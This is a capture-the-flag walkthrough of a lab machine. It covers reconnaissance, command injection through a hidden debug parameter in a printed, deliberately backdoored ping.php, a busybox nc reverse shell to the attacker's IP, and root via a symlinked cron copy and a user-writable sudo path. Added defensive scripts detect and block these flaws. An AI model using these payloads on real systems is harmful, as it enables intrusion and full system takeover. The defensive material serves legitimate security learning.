Group-member box: Byxs20

1. Information gathering
2. Port 80

Information gathering

Run arp-scan -l to find the target's IP:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:3d:c2:d3 PCS Systemtechnik GmbH
192.168.31.149 08:00:27:9e:3d:15 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.406 seconds (106.40 hosts/sec). 3 responded
```

Then scan for open ports with nmap:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.149
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-20 06:02 EDT
Nmap scan report for 192.168.31.149
Host is up (0.0018s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:9E:3D:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
```

Port 80

Enumerate directories with gobuster:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "192.168.31.149" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.jpg
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.149
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,jpg
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/templates (Status: 301) [Size: 320] [--> http://192.168.31.149/templates/]
/template.php (Status: 200) [Size: 258]
/conf (Status: 301) [Size: 315] [--> http://192.168.31.149/conf/]
/ping.php (Status: 200) [Size: 11]
```

/template.php contains a fake file inclusion (you can tell by reading the file once you have a shell later). ping.php runs the ping command, so let's fuzz its parameters:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arjun -u "http://192.168.31.149/ping.php"
Arjun v2.2.7

[*] Scanning 0/1: http://192.168.31.149/ping.php
[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Logicforcing the URL endpoint
[✓] parameter detected: debug, based on: http headers
[+] Parameters found: debug
```

It finds a debug parameter (I was actually trying to fuzz out the parameter that gets concatenated into the ping command, and stumbled on this by accident); the IP parameter is simply ip:

```
http://192.168.31.149/ping.php?debug&ip=;ls
```

Commands can be chained onto the ip value and are executed.

ping.php:

```php
<?php
// diag.php - strict validation on the surface, a hidden debug backdoor underneath
$ip = $_GET['ip'] ?? '';

// Backdoor trigger: any request that carries a debug parameter
if(isset($_GET['debug'])){
    // Turn off error reporting so paths are not exposed
    error_reporting(0);

    // Print detailed system information (disguised as a debug mode)
    echo "<pre>";
    echo "[*] Debug Mode Activated\n";
    echo "[+] Raw Command: ping -c 3 " . $ip . "\n";

    // Command built by string concatenation and executed directly (no filtering at all)
    system("ping -c 3 " . $ip);

    // Leak sensitive information
    echo "\n\n=== System Info ===\n";
    echo "PHP User: " . shell_exec('whoami');
    echo "PHP Version: " . phpversion() . "\n";
    echo "Disable Functions: " . ini_get('disable_functions') . "\n";
    echo "</pre>";
    exit;
}

// Main path: strict IPv4 regex validation (airtight)
if (!preg_match('/^(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)$/', $ip)) {
    die("Invalid IP!");
}

// Safe command execution (no injection possible)
$cmd = ['ping', '-c', '3', $ip];
system(escapeshellcmd(implode(' ', $cmd)));
?>
```

Then use busybox to get a reverse shell:

```
;busybox%20nc%20192.168.31.129%204444%20-e%20/bin/bash
```
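On the defending side, every request in this chain lands in the Apache access log, so the same abuse is easy to spot after the fact. The script below is an added example, not code from the original write-up: it parses common-log-format lines (constructed here) and flags ping.php requests that carry the hidden debug switch or an ip value that is not a dotted quad, which catches the probes the regex branch rejected as well as the ones the debug branch executed.

```shell
#!/bin/sh
# Added example, not from the original write-up: scan Apache access-log
# lines for requests to ping.php that carry the hidden "debug" switch or
# pass a non-IPv4 "ip" value. The four log lines are constructed.
set -f   # no globbing while we split strings with "set --"
SAMPLE_LOG='192.168.31.129 - - [20/Apr/2025:06:05:01 -0400] "GET /ping.php?ip=8.8.8.8 HTTP/1.1" 200 231
192.168.31.129 - - [20/Apr/2025:06:05:09 -0400] "GET /ping.php?debug&ip=;ls HTTP/1.1" 200 512
192.168.31.129 - - [20/Apr/2025:06:05:30 -0400] "GET /ping.php?ip=;busybox%20nc%20192.168.31.129%204444%20-e%20/bin/bash HTTP/1.1" 200 11
192.168.31.129 - - [20/Apr/2025:06:06:00 -0400] "GET /template.php?file=index HTTP/1.1" 200 258'

# Strict dotted-quad check: four numeric octets, each 0-255, nothing else.
is_ipv4() {
    case "$1" in ''|*[!0-9.]*|.*|*.|*..*) return 1 ;; esac
    oldifs=$IFS; IFS=.; set -- $1; IFS=$oldifs
    [ "$#" -eq 4 ] || return 1
    for o in "$@"; do [ "$o" -le 255 ] || return 1; done
    return 0
}

# One ping.php query string: exit 0 when the request should be flagged.
suspicious_query() {
    debug=0; ip=''
    oldifs=$IFS; IFS='&'; set -- $1; IFS=$oldifs
    for kv in "$@"; do
        case "$kv" in debug|debug=*) debug=1 ;; ip=*) ip=${kv#ip=} ;; esac
    done
    [ "$debug" -eq 1 ] && return 0
    [ -n "$ip" ] && ! is_ipv4 "$ip" && return 0
    return 1
}

# Print every flagged line from the log text passed as $1.
flag_ping_abuse() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        req=${line#*\"}; req=${req%%\"*}     # GET /path?query HTTP/1.1
        path=${req#* }; path=${path%% *}     # /path?query
        case "$path" in
            /ping.php) query='' ;;
            /ping.php\?*) query=${path#*\?} ;;
            *) continue ;;
        esac
        suspicious_query "$query" && printf '%s\n' "$line"
    done
}

flag_ping_abuse "$SAMPLE_LOG"
```

Run it against a real log with `flag_ping_abuse "$(cat /var/log/apache2/access.log)"`; the two injected requests are the only lines it prints for the sample.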

Once we have a shell, check sudo -l:

```
www-data@Byxs20:/tmp$ sudo -l
Matching Defaults entries for www-data on Byxs20:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Byxs20:
(ALL : ALL) NOPASSWD: /usr/sbin/reboot
```

We can run reboot.

Upload pspy to watch the processes:

```
www-data@Byxs20:/tmp$ busybox wget 192.168.31.129/pspy64
```

We can see root copying /var/www/html/conf/apache2.conf.bak to /etc/apache2/apache2.conf:

```
2025/04/20 06:11:01 CMD: UID=0     PID=749    | /bin/sh -c cp /var/www/html/conf/apache2.conf.bak  /etc/apache2/apache2.conf
```

The apache2.conf.bak file is under our control. Later, after a hint from the group owner, it dawned on me: we can just make a symlink, since /etc/apache2/apache2.conf is readable to us.

```
www-data@Byxs20:/var/www/html/conf$ ln -sf /home/welcome/user.txt apache2.conf.bak
www-data@Byxs20:/var/www/html/conf$ cat /etc/apache2/apache2.conf
flag{user-05659dca555d4ddbc396b319645f3d2a}
www-data@Byxs20:/var/www/html/conf$ ln -sf /root/root.txt apache2.conf.bak
www-data@Byxs20:/var/www/html/conf$ cat /etc/apache2/apache2.conf
flag{root-f9ef88715e3bbec612f9f88d64ae3a99}
```

Another approach is to modify apache2.conf.bak so that the web service runs with welcome's privileges: change the User and Group lines in apache2.conf.bak.

```
User welcome
Group welcome
```

Then upload it, reboot the box, and get a reverse shell again; the user is now welcome. (You cannot set this to root, because apache2 refuses to start as root by default; running it as root requires recompiling with "-DBIG_SECURITY_HOLE" added to the CFLAGS environment variable.)

```
id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)
```
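Both escalations above, the symlink trick and the edited User/Group lines, come from the same defect: a root cron job copies a file from a directory that www-data can write to, straight into Apache's configuration. The script below is an added example, not code from the original write-up or the box: a fail-closed replacement for that copy that refuses symlinks, files not owned by the expected user, and files or directories writable by group/other. It assumes GNU stat and cp, and takes source, destination and expected owner as parameters.

```shell
#!/bin/sh
# Added example, not from the original write-up: a fail-closed replacement for
# the root cron job's "cp /var/www/html/conf/apache2.conf.bak /etc/apache2/apache2.conf".
# It refuses symlinks, non-regular files, files not owned by the expected user,
# and files or directories that group/other can write to, so neither a planted
# symlink nor an edited User/Group line from www-data reaches Apache's config.
# Assumes GNU stat and cp; paths and owner are parameters so it can be tested.

# Exit 0 only when $1 is a plain file owned by $2 that no one else can modify
# or replace; every refusal prints a reason to stderr and exits 1.
safe_to_copy() {
    src=$1; owner=$2
    if [ -L "$src" ]; then echo "refuse: $src is a symlink" >&2; return 1; fi
    if [ ! -f "$src" ]; then echo "refuse: $src is not a regular file" >&2; return 1; fi
    if [ "$(stat -c %U "$src")" != "$owner" ]; then
        echo "refuse: $src is not owned by $owner" >&2; return 1
    fi
    # last octal digit = other, second-to-last = group; 2/3/6/7 carry the write bit
    for p in "$src" "$(dirname "$src")"; do
        case "$(stat -c %a "$p")" in
            *[2367]|*[2367]?) echo "refuse: $p is writable by group/other" >&2; return 1 ;;
        esac
    done
    return 0
}

# Copy $1 to $2 only after the checks pass. --remove-destination unlinks an
# existing target first, so a symlink planted at $2 is not written through.
restore_conf() {
    safe_to_copy "$1" "$3" || return 1
    cp --remove-destination -T "$1" "$2"
}

# Cron usage: restore_conf /var/www/html/conf/apache2.conf.bak /etc/apache2/apache2.conf root
if [ "$#" -eq 3 ]; then restore_conf "$@"; fi
```

The check and the copy are still two separate steps, so the durable fix is for root never to copy from a directory the web user can write to; this guard only makes the existing job fail closed.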

Check sudo -l:

```
welcome@Byxs20:/home/welcome$ sudo -l
Matching Defaults entries for welcome on Byxs20:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Byxs20:
(ALL : ALL) NOPASSWD: /usr/sbin/reboot
(ALL : ALL) NOPASSWD: /home/welcome/test/test
```

Now the trump card: rename the test directory and create a fresh test/test:

```
welcome@Byxs20:/home/welcome$ mv test 1
welcome@Byxs20:/home/welcome$ mkdir test
welcome@Byxs20:/home/welcome$ echo 'bash -p'>test/test
welcome@Byxs20:/home/welcome$ chmod +x test/test
welcome@Byxs20:/home/welcome$ sudo /home/welcome/test/test
root@Byxs20:/home/welcome#
```
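The last step works because sudo trusts a path inside the user's own home directory, which the user can rename and recreate at will. The script below is an added example, not part of the write-up: it reads rules in the form sudo -l prints and reports each NOPASSWD command whose file, or any parent directory, the invoking user owns or anyone can write to. It assumes GNU stat, and the rule lines it is tested with are constructed from the output above.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit sudo rules in the
# "(ALL : ALL) NOPASSWD: /path" form printed by sudo -l and report every command
# whose file, or any parent directory, the invoking user owns or anyone can
# write to. That is the /home/welcome/test/test defect: sudo trusts a path the
# user can rename and recreate. Assumes GNU stat.

# Exit 0 (and print why) if user $1 can replace what sudo would execute at $2.
path_controlled_by() {
    user=$1; p=$2
    while :; do
        if [ -L "$p" ] || [ -e "$p" ]; then
            owner=$(stat -c %U "$p"); mode=$(stat -c %a "$p")
            # a symlink's mode bits mean nothing; only its owner counts
            [ -L "$p" ] && mode=link
            # last octal digit = other; 2/3/6/7 carry the write bit
            case "$mode" in *[2367]) writable=1 ;; *) writable=0 ;; esac
            if [ "$owner" = "$user" ] || [ "$writable" -eq 1 ]; then
                echo "$2: replaceable via $p (owner $owner, mode $mode)"
                return 0
            fi
        fi
        [ "$p" = / ] && return 1
        p=$(dirname "$p")
    done
}

# Read rule lines from stdin, print the risky ones for user $1, and return
# the number of risky rules as the exit status (0 means the rules are clean).
audit_sudo_rules() {
    user=$1; risky=0
    while IFS= read -r rule; do
        case "$rule" in *NOPASSWD:*) ;; *) continue ;; esac
        cmd=${rule##*NOPASSWD: }; cmd=${cmd%% *}
        path_controlled_by "$user" "$cmd" && risky=$((risky + 1))
    done
    return "$risky"
}

# Usage as a script: sudo -l -U welcome | sh audit.sh welcome
if [ "$#" -eq 1 ]; then audit_sudo_rules "$1"; fi
```

A clean rule points at a root-owned file in a root-owned directory such as /usr/local/sbin; if the helper has to stay, the fix is to move it there and update the sudoers entry.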